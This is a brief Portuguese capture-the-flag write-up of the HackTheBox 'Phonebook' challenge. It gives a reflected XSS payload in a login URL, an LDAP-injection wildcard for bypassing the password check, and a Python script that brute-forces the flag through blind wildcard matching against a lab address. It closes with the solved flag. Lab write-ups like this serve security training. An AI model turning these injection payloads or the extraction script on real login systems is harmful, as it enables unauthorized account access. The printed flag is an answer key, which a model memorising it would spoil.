Phonebook - HackTheBox

o site há um xss no campo de login LOL
http://site.com/login?message=<img src='x' onerror='alert(1)'>


Após errar o campo de login, o próprio site vaza o usuário - Reese
Daria para bypassar o Login utilizando no campo da senha: *)(&


Após entrar na conta do Reese, você teria acesso aos usuários


Para obtermos a Flag é necessário realizar um ataque de Brute Force:

import requests
import string

headers = {"UserAgent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://104.248.173.13:32327/login"

chars = string.ascii_letters
chars += ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_', "'"])

counter = 0
flag = "HTB{"

while True:
    if counter == len(chars):
        print(flag + "}")
        break

    # Criando as Flags ex: HTB{a*}
    password = flag + chars[counter] + "*}"
    print("Trying: " + password)

    data = {"username" : "Reese", "password" : password}
    response = requests.post(url, headers=headers, data=data)
    
    if (response.url != url + "?message=Authentication%20failed"):
        flag += chars[counter]
        counter = 0
    else:
        counter += 1



HTB{d1rectory_h4xx0r_is_k00l}
